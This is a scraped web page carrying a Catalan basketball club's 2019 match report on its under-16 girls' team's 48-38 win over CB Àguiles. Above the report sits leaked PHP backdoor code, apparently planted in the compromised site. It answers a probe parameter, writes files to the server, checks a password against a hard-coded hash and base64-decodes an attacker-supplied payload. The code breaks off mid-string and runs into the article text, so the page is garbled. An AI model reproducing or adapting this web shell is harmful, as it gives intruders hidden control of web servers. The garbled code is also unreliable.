function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 05 B rubrica amb un gran quart període l'excel·lent partit contra el CB Àguiles (48-38) - Tgn Bàsquet Club -

El cadet femení 05 B rubrica amb un gran quart període l’excel·lent partit contra el CB Àguiles (48-38)

Updated: desembre 3, 2019

El cadet femení 05 B va fer un dels millors partits de la temporada i va derrotar el CB Àguiles, un dels conjunts de la part alta de la classificació. El TGN Bàsquet va fer una bona sortida de partit i va passar pràcticament per sobre del seu rival a còpia de ritme i intensitat (24-17 a la mitja part). Però l’Àguiles va reaccionar aprofitant les errades de les locals i va ajustar el marcador a falta de l’últim període. En uns deu minuts decisius, el TGN Bàsquet va demostrar la seva solidesa, es va fer fort en defensa i només va deixar anotar tres punts al seu rival. L’encert ofensiu de Labata i Jaria i l’excel·lència defensiva de Morales van rubricar un quart període de matrícula d’honor de tot l’equip.